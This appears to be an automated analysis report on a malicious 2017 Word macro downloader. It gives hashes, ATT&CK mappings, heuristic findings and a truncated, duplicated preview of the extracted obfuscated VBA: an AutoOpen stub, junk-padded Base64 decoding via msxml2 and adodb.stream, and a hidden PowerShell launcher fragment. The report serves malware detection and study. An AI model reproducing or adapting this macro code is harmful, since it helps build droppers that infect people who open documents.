Office (OLE) malware analysis — malicious · 040e61e10a7a85c2

MALICIOUS

Office (OLE)

165.5 KB Created: 2017-05-03 20:33:00 Authoring application: Microsoft Office Word First seen: 2017-05-13

MD5: 1e6f3631ec0655f646d141cef590ccd7 SHA-1: ac135fbaf1e79dd4ad984d4e98da8632f814b21d SHA-256: 040e61e10a7a85c23041c1f0e4635dd2ea9307787eb17e88f80372529e9209d5

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains critical heuristics indicating the presence of VBA macros, specifically an AutoOpen macro that utilizes Shell() and CreateObject() calls. A Base64-decoded Shell command stager was identified, which decodes to 'powershell -WindowStyle Hidden $wscript = new'. This strongly suggests the macro's purpose is to download and execute a secondary payload via PowerShell. The ClamAV detection further supports its malicious nature as a downloader.

Heuristics 9

ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18305 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18305 bytes
SHA-256: `a89f93a6c1b46ba0ba161523db5cb7464bd54efbcca17ba85e227add2ab5c6e6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoOpen() Dim X7oxiVPhL As Long X7oxiVPhL = -509207468 Dim UG7aJ As String UG7aJ = StrConv(PBArpzn, vbLowerCase) Dim DR5N8 As Byte DR5N8 = 209 UO6PHWcs End Sub Attribute VB_Name = "Module2" Public Function rAXwWdJpR(ByVal ENKIwcCZ) Dim BoMwxCX BoMwxCX = AscB("s") Dim rgBAie As Single rgBAie = Fix(30498.797580191) Dim MXt67olH3 Dim sVmv3N Dim WQigaL682 As String WQigaL682 = RTrim(Z5WEAa) Dim Rfpxg02W As Integer Rfpxg02W = Sgn(-26322) Dim ATlgF4vrn As Byte ATlgF4vrn = 110 Dim OSevOC As Integer OSevOC = 21494 Dim WzJqud8K As Single WzJqud8K = Sgn(46516.790475328) Set MXt67olH3 = CreateObject("msxml2.domdocument") Dim A1xFcG As Integer A1xFcG = Sgn(14883) Dim JatvVwZQ As Single JatvVwZQ = 32162.08666797 Dim Mo6Yz As Byte Mo6Yz = 184 Dim sQ5KstHD As Boolean sQ5KstHD = True Dim VSuib As Byte VSuib = 201 Dim HbT1h As Boolean HbT1h = True Set sVmv3N = MXt67olH3.CreateElement(zpcJf) Dim UdkSHsYgy UdkSHsYgy = vbNullString Dim vtX9SJBT As Byte vtX9SJBT = 119 Dim yotLwu yotLwu = AscB("W") With sVmv3N Dim UhNusA As Double UhNusA = Int(7103.2352652453) Dim RViY9lhQ As Integer RViY9lhQ = 29028 Dim p1hdoZr As Integer p1hdoZr = -9837 sVmv3N.DataType = "bin." & zpcJf Dim n1wFbICU As Byte n1wFbICU = 199 Dim WLOx8tPG As Single WLOx8tPG = 60066.403182607 Dim aw21cE9yM As Boolean aw21cE9yM = True sVmv3N.Text = ENKIwcCZ End With Dim ZYXNFjb As Double ZYXNFjb = Val(45599.526797947) Dim TlEmyNGf As String TlEmyNGf = UCase(VsCInjaA) Dim kCvLfKP kCvLfKP = Trim(wLSCdU) Dim hm1JuwNV As String hm1JuwNV = Gg8nC1 Dim qnEy5ZQf As Byte qnEy5ZQf = 80 rAXwWdJpR = IJtdmg(sVmv3N.nodeTypedValue) Dim T0KHd As Byte T0KHd = 220 Dim e6ukp As String e6ukp = UCase(B18P43tY) Set sVmv3N = Nothing Set MXt67olH3 = Nothing End Function Function IJtdmg(Binary) Dim PROniZQxz As Single PROniZQxz = Fix(34705.866860916) Dim BAOmJTw9 As Byte BAOmJTw9 = 119 Dim f3j2dJDN f3j2dJDN = Asc("i") Const U6o1en = 2 Const UGL4xUv = 1 Dim NcCwI2 As Single NcCwI2 = Sgn(46814.133724586) Dim xBcmUae As Double xBcmUae = 56353.436635835 Dim B7ul1Jgi As Double B7ul1Jgi = 45138.809175597 Dim Lv69oiS As Single Lv69oiS = 63317.924212844 Dim fUtC1FLDR fUtC1FLDR = Len(ys6KqfCh) Dim QtsEvr As Integer QtsEvr = Sgn(25616) Dim FbeO4dx Dim cPXcbNWO As Single cPXcbNWO = Sgn(62798.584131366) Dim E9OYKvsk As Byte E9OYKvsk = 11 Dim Ey9AYzaLX As Double Ey9AYzaLX = 28399.655817253 Dim PSvzf7PYO As Single PSvzf7PYO = Sgn(82.768346808908) Dim WUFrI1qoz As Long WUFrI1qoz = -848897742 Dim GQumR As String GQumR = Len(jnf5HE) Dim dIDtnvSH As Single dIDtnvSH = 298.67982250033 Set FbeO4dx = CreateObject("adodb.stream") Dim zH8wo6u4t As Single zH8wo6u4t = Sgn(20803.585300553) Dim ole1tVEvO As Single ole1tVEvO = Val(13931.819669379) With FbeO4dx Dim A6fMY As Long A6fMY = 0 Dim lFKNiU As Boolean lFKNiU = True Dim kl4Lx As Long kl4Lx = 0 .Type = UGL4xUv Dim BVWoB As Double BVWoB = 11313.63957818 Dim uZbB5YA9 As Boolean uZbB5YA9 = True .Open Dim SEUHb0 As Integer SEUHb0 = Sgn(6536) Dim wWFh8kIP As Long wWFh8kIP = Sgn(0) .Write Binary Dim qs6UaqY As String qs6UaqY = UCase(zIwE316) Dim JBc6HN2Z As Integer JBc6HN2Z = -22828 Dim SJ7Mcam As Boolean SJ7Mcam = False Dim V7lzXwa8T As Byte V7lzXwa8T = 253 Dim VGBOc9CmI VGBOc9CmI = "5" .Position = 0 Dim vLvThc4 As Boolean vLvThc4 = False Dim V9yLQ As Single V9yLQ = Sgn(46128.359746306) .Type = U6o1en Dim kFkJPgEc As Long kFkJPgEc = -1076017696 Dim dILsr As Double dILsr = Sgn(25231.673889325) Dim S0U8gwlWm As Double S0U8gwlWm = 37869.947359013 Dim nfR9lkzu As Byte nfR9lkzu = 250 Dim LkIxSiyN6 As Integer LkIxSiyN6 = Sgn(11773) Dim MtoRz MtoRz = UCase(qr60x) Dim l6KxC As String l6Kx ... (truncated)

SHA-256: a89f93a6c1b46ba0ba161523db5cb7464bd54efbcca17ba85e227add2ab5c6e6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim X7oxiVPhL As Long
X7oxiVPhL = -509207468
Dim UG7aJ As String
UG7aJ = StrConv(PBArpzn, vbLowerCase)
Dim DR5N8 As Byte
DR5N8 = 209
UO6PHWcs
End Sub

Attribute VB_Name = "Module2"
Public Function rAXwWdJpR(ByVal ENKIwcCZ)
Dim BoMwxCX
BoMwxCX = AscB("s")
Dim rgBAie As Single
rgBAie = Fix(30498.797580191)
Dim MXt67olH3
Dim sVmv3N
Dim WQigaL682 As String
WQigaL682 = RTrim(Z5WEAa)
Dim Rfpxg02W As Integer
Rfpxg02W = Sgn(-26322)
Dim ATlgF4vrn As Byte
ATlgF4vrn = 110

Dim OSevOC As Integer
OSevOC = 21494
Dim WzJqud8K As Single
WzJqud8K = Sgn(46516.790475328)
Set MXt67olH3 = CreateObject("msxml2.domdocument")
Dim A1xFcG As Integer
A1xFcG = Sgn(14883)
Dim JatvVwZQ As Single
JatvVwZQ = 32162.08666797
Dim Mo6Yz As Byte
Mo6Yz = 184
Dim sQ5KstHD As Boolean
sQ5KstHD = True
Dim VSuib As Byte
VSuib = 201
Dim HbT1h As Boolean
HbT1h = True
Set sVmv3N = MXt67olH3.CreateElement(zpcJf)
Dim UdkSHsYgy
UdkSHsYgy = vbNullString
Dim vtX9SJBT As Byte
vtX9SJBT = 119
Dim yotLwu
yotLwu = AscB("W")
With sVmv3N
Dim UhNusA As Double
UhNusA = Int(7103.2352652453)
Dim RViY9lhQ As Integer
RViY9lhQ = 29028
Dim p1hdoZr As Integer
p1hdoZr = -9837
sVmv3N.DataType = "bin." & zpcJf

Dim n1wFbICU As Byte
n1wFbICU = 199
Dim WLOx8tPG As Single
WLOx8tPG = 60066.403182607
Dim aw21cE9yM As Boolean
aw21cE9yM = True
sVmv3N.Text = ENKIwcCZ
End With
Dim ZYXNFjb As Double
ZYXNFjb = Val(45599.526797947)
Dim TlEmyNGf As String
TlEmyNGf = UCase(VsCInjaA)
Dim kCvLfKP
kCvLfKP = Trim(wLSCdU)
Dim hm1JuwNV As String
hm1JuwNV = Gg8nC1
Dim qnEy5ZQf As Byte
qnEy5ZQf = 80
rAXwWdJpR = IJtdmg(sVmv3N.nodeTypedValue)

Dim T0KHd As Byte
T0KHd = 220
Dim e6ukp As String
e6ukp = UCase(B18P43tY)
Set sVmv3N = Nothing
Set MXt67olH3 = Nothing
End Function
Function IJtdmg(Binary)
Dim PROniZQxz As Single
PROniZQxz = Fix(34705.866860916)
Dim BAOmJTw9 As Byte
BAOmJTw9 = 119
Dim f3j2dJDN
f3j2dJDN = Asc("i")
Const U6o1en = 2
Const UGL4xUv = 1
Dim NcCwI2 As Single
NcCwI2 = Sgn(46814.133724586)
Dim xBcmUae As Double
xBcmUae = 56353.436635835
Dim B7ul1Jgi As Double
B7ul1Jgi = 45138.809175597
Dim Lv69oiS As Single
Lv69oiS = 63317.924212844
Dim fUtC1FLDR
fUtC1FLDR = Len(ys6KqfCh)
Dim QtsEvr As Integer
QtsEvr = Sgn(25616)
Dim FbeO4dx
Dim cPXcbNWO As Single
cPXcbNWO = Sgn(62798.584131366)
Dim E9OYKvsk As Byte
E9OYKvsk = 11
Dim Ey9AYzaLX As Double
Ey9AYzaLX = 28399.655817253
Dim PSvzf7PYO As Single
PSvzf7PYO = Sgn(82.768346808908)

Dim WUFrI1qoz As Long
WUFrI1qoz = -848897742
Dim GQumR As String
GQumR = Len(jnf5HE)
Dim dIDtnvSH As Single
dIDtnvSH = 298.67982250033
Set FbeO4dx = CreateObject("adodb.stream")
Dim zH8wo6u4t As Single
zH8wo6u4t = Sgn(20803.585300553)
Dim ole1tVEvO As Single
ole1tVEvO = Val(13931.819669379)
With FbeO4dx

Dim A6fMY As Long
A6fMY = 0
Dim lFKNiU As Boolean
lFKNiU = True
Dim kl4Lx As Long
kl4Lx = 0
.Type = UGL4xUv

Dim BVWoB As Double
BVWoB = 11313.63957818
Dim uZbB5YA9 As Boolean
uZbB5YA9 = True
.Open
Dim SEUHb0 As Integer
SEUHb0 = Sgn(6536)
Dim wWFh8kIP As Long
wWFh8kIP = Sgn(0)
.Write Binary
Dim qs6UaqY As String
qs6UaqY = UCase(zIwE316)
Dim JBc6HN2Z As Integer
JBc6HN2Z = -22828
Dim SJ7Mcam As Boolean
SJ7Mcam = False
Dim V7lzXwa8T As Byte
V7lzXwa8T = 253
Dim VGBOc9CmI
VGBOc9CmI = "5"
.Position = 0

Dim vLvThc4 As Boolean
vLvThc4 = False
Dim V9yLQ As Single
V9yLQ = Sgn(46128.359746306)
.Type = U6o1en

Dim kFkJPgEc As Long
kFkJPgEc = -1076017696
Dim dILsr As Double
dILsr = Sgn(25231.673889325)
Dim S0U8gwlWm As Double
S0U8gwlWm = 37869.947359013

Dim nfR9lkzu As Byte
nfR9lkzu = 250
Dim LkIxSiyN6 As Integer
LkIxSiyN6 = Sgn(11773)
Dim MtoRz
MtoRz = UCase(qr60x)
Dim l6KxC As String
l6Kx
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.